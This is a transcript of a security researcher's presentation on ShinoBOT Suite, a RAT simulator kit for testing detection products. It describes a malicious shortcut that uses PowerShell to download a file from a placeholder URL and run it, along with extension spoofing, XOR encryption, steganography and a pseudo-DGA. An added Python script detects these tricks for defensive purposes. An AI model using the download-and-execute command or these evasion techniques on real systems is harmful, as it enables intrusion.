ShinoBOT Suite presentation
TRANSCRIPT
Shota Shinogi @Sh1n0g1
http://shinosec.com
Security Researcher at Macnica Networks Corp.
Japanese distributor of security/network products
Enthusiast of writing (ethical) malware
Presented ShinoBOT (not the Suite) last year at Arsenal
ShinoBOT.exe
ShinoBOT is a RAT (simulator)
Presented at Black Hat USA 2013 Arsenal
It connects to ShinoC2, the C&C server, using HTTP(S).
What you can do with ShinoBOT via ShinoC2
Execute a command
Upload / Download a file
Take a screenshot
It is a SIMULATOR
It has a GUI
You need the password shown on the GUI to control it
ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly sophisticated attack campaign.
What is contained
Exploit (a shortcut that contains a malicious script)
Malware Delivery Server (ShinoMAL.mooo.com)
Downloader/Dropper (ShinoDownloader.exe)
RAT (ShinoBOT.exe)
C&C Server (ShinoC2)
Steganography, crypto, DGA and some evasion techniques
There are a bunch of new security tools to detect and respond to unknown threats
Sandbox-based Malware Detection System
ETDR (Endpoint Threat Detect & Response)
SIEM (Security Information & Event Manager)
Security Analytics / Network Forensics
It is hard to evaluate those new products
Known malware will be detected by signature
♦ ≠ Unknown Threat
To simulate a realistic APT
♦ requires a high skill level
♦ takes too much time
♦ costs a lot of money when using commercial tools
[Diagram: attack flow of ShinoBOT Suite. Labels: Malicious Shortcut, Downloader/Dropper, RAT, Decoy File, C&C Server, Malware Deploy Server, dldr_tmp, ShinoBOT.exe, img.jpg. Steps: 1) Download, 2) Execute, 3) Drop, 4) Open, 5) Download, 6) Decrypt, 7) Execute, 8) C2 Communication]
Decoy File
ShinoBOT works in the background
To control ShinoBOT (RAT), you need to grab the password; this is to prevent the abuse of ShinoBOT.
ShinoBOT saves its password in a text file in the user's profile folder (C:\Users\%USERNAME%\sb.pas).
You can access the password file remotely: \\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas
This password protection is there to prevent real attackers from abusing ShinoBOT.
Access ShinoBOT.com
Go to the host list
Your host will appear in the host list
Click the [View/Assign Jobs] link
Enter the password to see the Loot (result) of the command
Enter the password to assign a new job
Malicious Shortcut
"target" of the shortcut (all in 1 line)
cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOADERURL', '%TEMP%\LicenseRnd.txt'); & %TEMP%\LicenseRnd.txt & ::DECOYFILENAME
POWERSHELL downloads the downloader and saves it
CMD executes the downloader (Rnd means a random string)
CMD ignores the rest of the line because :: starts a comment
Extension Spoofing
In the target of the shortcut there is the line "%TEMP%\LicenseRnd.txt" (previous slide)
Usually, when you double-click a file with the .txt extension, Notepad will launch
CMD.exe can execute executables (files that contain the MZ header) with any extension
ShinoBOT Suite uses this technique to spoof the extension and make the downloader hard to find on the disk
Actually, it is ShinoDownloader.exe
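A defender-side check for the two tricks described above (the shortcut target pattern and the spoofed extension), added here as an example and not part of the presentation or the ShinoBOT code: it reports the indicators found in a shortcut's target string and lists files in a folder whose extension looks harmless but whose content starts with the MZ header. The sample target string, the extension list and the scanned files are constructed for this example.

```python
import os
import re
import tempfile

# Constructed sample of the shortcut "target" from the slide (page placeholders kept).
SAMPLE_TARGET = (
    "cmd.exe /c powershell (new-object System.Net.WebClient)"
    ".DownloadFile('DOWNLOADERURL', '%TEMP%\\LicenseAb12.txt');"
    " & %TEMP%\\LicenseAb12.txt & ::DECOYFILENAME"
)
# Extensions a user expects to open in a viewer, not to run (assumed list).
NON_EXEC_EXT = {".txt", ".jpg", ".png", ".pdf", ".doc", ".docx", ".log"}

def analyze_shortcut_target(target):
    """Return the indicators found in a shortcut's target command line."""
    hits = []
    if re.search(r"webclient\)\s*\.downloadfile", target, re.I):
        hits.append("powershell WebClient.DownloadFile")
    # The path DownloadFile writes to is its second quoted argument.
    m = re.search(r"downloadfile\(\s*'[^']*'\s*,\s*'([^']*)'", target, re.I)
    saved = m.group(1) if m else None
    if saved and os.path.splitext(saved)[1].lower() in NON_EXEC_EXT:
        hits.append("download saved with non-executable extension")
        # The same path handed to cmd.exe as a command = extension spoofing.
        if re.search(r"&\s*" + re.escape(saved) + r"\b", target):
            hits.append("non-executable extension executed by cmd")
    if re.search(r"&\s*::", target):
        hits.append("trailing :: comment hides text (decoy name)")
    return hits

def find_spoofed_executables(directory):
    """List files with a harmless-looking extension whose content starts with MZ."""
    spoofed = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and os.path.splitext(name)[1].lower() in NON_EXEC_EXT:
            with open(path, "rb") as f:
                if f.read(2) == b"MZ":
                    spoofed.append(name)
    return spoofed

def demo_spoof_scan():
    """Build a constructed %TEMP%-like folder with three files and scan it."""
    d = tempfile.mkdtemp()
    for name, data in [("LicenseAb12.txt", b"MZ\x90\x00" + b"\x00" * 60),
                       ("notes.txt", b"plain text"), ("tool.exe", b"MZ\x90")]:
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return find_spoofed_executables(d)
```

Run find_spoofed_executables against the real %TEMP% folder of a test host to see whether the spoofed downloader is found; the .exe in the demo is deliberately not flagged because its extension is honest.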
Crypto Stuff
ShinoBOT Suite uses XOR and ROR (a 4-bit rotate)
The key is used just for the XOR, and the ROR is always 4 bits
ShinoBOT Suite generates a random key (200 to 255 bytes), so it is a little difficult to decrypt the whole file without having the key
Steganography
The encrypted RAT is hidden in the kitten image.
[Binary Visualizer figure: JPG data, Encrypted RAT]
Domain Generation Algorithm
ShinoBOT (the RAT) uses a pseudo-DGA.
It generates a random host name for the C2 server.
rrrr.r.shinobot.com
"r" is replaced by a random character.
The DNS for shinobot.com answers any host name with the C2 server's IP address.
[Diagram: the same attack flow with phishing e-mail and exploit stages. Labels: Phishing Email, Exploit, ShellCode, Downloader/Dropper, RAT, Decoy File, C&C Server, Malware Deploy Server, KB1234567.exe, Invitation.pdf, Invitation.pdf (legitimate), ShinoBOT.exe, img.jpg. Steps: 1) Download, 2) Execute, 3) Drop, 4) Open, 5) Download, 6) Decrypt, 7) Execute, 8) C2 Communication]
Visit my site and get the recipe of ShinoBOT SUITE.
http://shinosec.com